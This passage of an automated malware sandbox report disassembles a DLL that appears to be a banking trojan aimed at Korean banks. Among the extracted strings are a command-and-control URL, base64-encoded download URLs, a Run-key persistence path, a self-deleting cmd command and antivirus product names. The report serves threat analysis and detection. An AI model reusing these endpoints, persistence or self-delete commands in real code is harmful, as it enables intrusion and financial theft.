                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                                                          • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                                                          • API String ID: 4077377486-2496724313
                                                                                                                                                                          • Opcode ID: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
                                                                                                                                                                          • Instruction ID: 293d0e7632e531392dd0fb5c2f77952c0a17312896667c4884a995f19a9271bc
                                                                                                                                                                          • Opcode Fuzzy Hash: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C81D6B6C04249BEFB01DBA4DC81EEF7B7DEF09394F244166F505A6186DA316E4087B1
                                                                                                                                                                          Function 10005DC6 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 113timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10005E23
                                                                                                                                                                            • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
                                                                                                                                                                            • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                                                          • String ID: %u MB$12091507$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 271660946-2089455369
                                                                                                                                                                          • Opcode ID: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
                                                                                                                                                                          • Instruction ID: c0ffa68043a95791f02fd04d8c4918fc6d3fd57fe225104bb55dd78593dce371
                                                                                                                                                                          • Opcode Fuzzy Hash: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
                                                                                                                                                                          • Instruction Fuzzy Hash: CB31C3B680460DBAEB11CB60DC46FDF77ACEF04351F54406AF644AB182EB35BB448B95
                                                                                                                                                                          Function 10006021 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 96libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$urlmon.dll$wininet.dll
                                                                                                                                                                          • API String ID: 2994545307-2475139894
                                                                                                                                                                          • Opcode ID: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
                                                                                                                                                                          • Instruction ID: 07a37e4b5f5db9f07829dfdfef9d508389309d866dd02fd17ced75df8caaf776
                                                                                                                                                                          • Opcode Fuzzy Hash: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 72313EB690461CBEEB11DBA4CC45FEF7B7DEB08341F5400A6F608AB181D7759A448EA0
                                                                                                                                                                          Function 10004921 Relevance: 12.3, APIs: 2, Strings: 6, Instructions: 337sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(?,00000000,00000001,00000000,00000000,?), ref: 10004A3A
                                                                                                                                                                          • wsprintfA.USER32 ref: 10004ADB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$v3lite
                                                                                                                                                                          • API String ID: 1749205058-4002687564
                                                                                                                                                                          • Opcode ID: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction ID: 59076712db6477dadbaa6102d4b2767c56af3142dc1d583c19f1c191fca588aa
                                                                                                                                                                          • Opcode Fuzzy Hash: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction Fuzzy Hash: 97B16CB2D0025CAAEB11DBE4CC85EDFBBBCEB45740F0045A6F205A6141EA71AB45CF61
                                                                                                                                                                          Function 10006D1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                                                            • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 1000408A
                                                                                                                                                                          • wsprintfA.USER32 ref: 10006DAB
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006DD1
                                                                                                                                                                            • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040E9
                                                                                                                                                                            • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                                                          Strings
                                                                                                                                                                          • U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D6D
                                                                                                                                                                          • %s "%s",ClassObject, xrefs: 10006DA5
                                                                                                                                                                          • REG_SZ, xrefs: 10006D67
                                                                                                                                                                          • COAPI, xrefs: 10006DC9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                                                          • String ID: %s "%s",ClassObject$COAPI$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
                                                                                                                                                                          • API String ID: 1762869224-2622945652
                                                                                                                                                                          • Opcode ID: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
                                                                                                                                                                          • Instruction ID: 1af9319de0d48fb467b647ae3650b89cedd961ef50c791020d1a6b5894edbf87
                                                                                                                                                                          • Opcode Fuzzy Hash: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
                                                                                                                                                                          • Instruction Fuzzy Hash: BA11B2B694411CBEFB11D3A4DC86FEA776CDB14380F1004A1F744B9085EAB16FC88AA4
                                                                                                                                                                          Function 1000532A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • , xrefs: 10005394
                                                                                                                                                                          • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000534E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                                                                                                                                                          • API String ID: 2994545307-230412946
                                                                                                                                                                          • Opcode ID: 9b1787d2dfbf068aca50b23a22cbcef1ccd3e01471b5ef7f497ffa82660ce614
                                                                                                                                                                          • Instruction ID: 0a715c4d5cc77e21522ecf04e59044d57c4e71f0c84efc3cca746646dee8662b
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1787d2dfbf068aca50b23a22cbcef1ccd3e01471b5ef7f497ffa82660ce614
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B01D27690431D76EB22EB28CC41FCE7E68EF483C2F0404B5BA496A056D7B1BE805A90
                                                                                                                                                                          Function 1002875F Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 92sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: 7$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-3701087130
                                                                                                                                                                          • Opcode ID: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
                                                                                                                                                                          • Instruction ID: 71c666905a5763b167ab1a21182f42240e287b7e11d47a96cc59b11d17f26c76
                                                                                                                                                                          • Opcode Fuzzy Hash: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4731F571408284AED712EB10DC8669E7FA6EF84385F50886DFAC85B112C770A9A49B53
                                                                                                                                                                          Function 1000858A Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 83sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$wsprintf
                                                                                                                                                                          • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
                                                                                                                                                                          • API String ID: 3195947292-1533272838
                                                                                                                                                                          • Opcode ID: d95f3378c41756f6a762341336361093e5ac87cac163c94da78467b986173758
                                                                                                                                                                          • Instruction ID: acd8b216c9490be150f41627fddde4231ced29d76843988cf1697fe551d5a772
                                                                                                                                                                          • Opcode Fuzzy Hash: d95f3378c41756f6a762341336361093e5ac87cac163c94da78467b986173758
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A17680021CBAEB11DBE48C85EDFBB7DEF08390F140466F604B6141EA756A858BA1
                                                                                                                                                                          Function 100062F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: strcspn$FormatTime___crt
                                                                                                                                                                          • String ID: http://
                                                                                                                                                                          • API String ID: 4006067733-1121587658
                                                                                                                                                                          • Opcode ID: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
                                                                                                                                                                          • Instruction ID: 5e5274a5df46717633dbefa534eebea5f36de8a9ab4d0e8209e5c86ee6f0ed2e
                                                                                                                                                                          • Opcode Fuzzy Hash: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
                                                                                                                                                                          • Instruction Fuzzy Hash: 6541457690421CBAEF11DBB4DC85FDE77BCDF08394F5004A6F608E6082DA75AF458AA1
                                                                                                                                                                          Function 10004642 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunkwsprintf
                                                                                                                                                                          • String ID: %s\%s$.$\*.*
                                                                                                                                                                          • API String ID: 2324811901-2210278135
                                                                                                                                                                          • Opcode ID: dd3fcc65249f11e8904a4ab8c1888655046cb056fe9947afd47f24fcef0f6234
                                                                                                                                                                          • Instruction ID: 788f7299f4ef3f0d15df8f53932c811205ff60b6d2b73f04fca062f583e9a503
                                                                                                                                                                          • Opcode Fuzzy Hash: dd3fcc65249f11e8904a4ab8c1888655046cb056fe9947afd47f24fcef0f6234
                                                                                                                                                                          • Instruction Fuzzy Hash: 59316FB6C0025CBEEF12DBA4CD46ECEBB79EF04380F1005E6F618A6051DB719B989B50
                                                                                                                                                                          Function 10006A91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65sleepthreadCOMMON
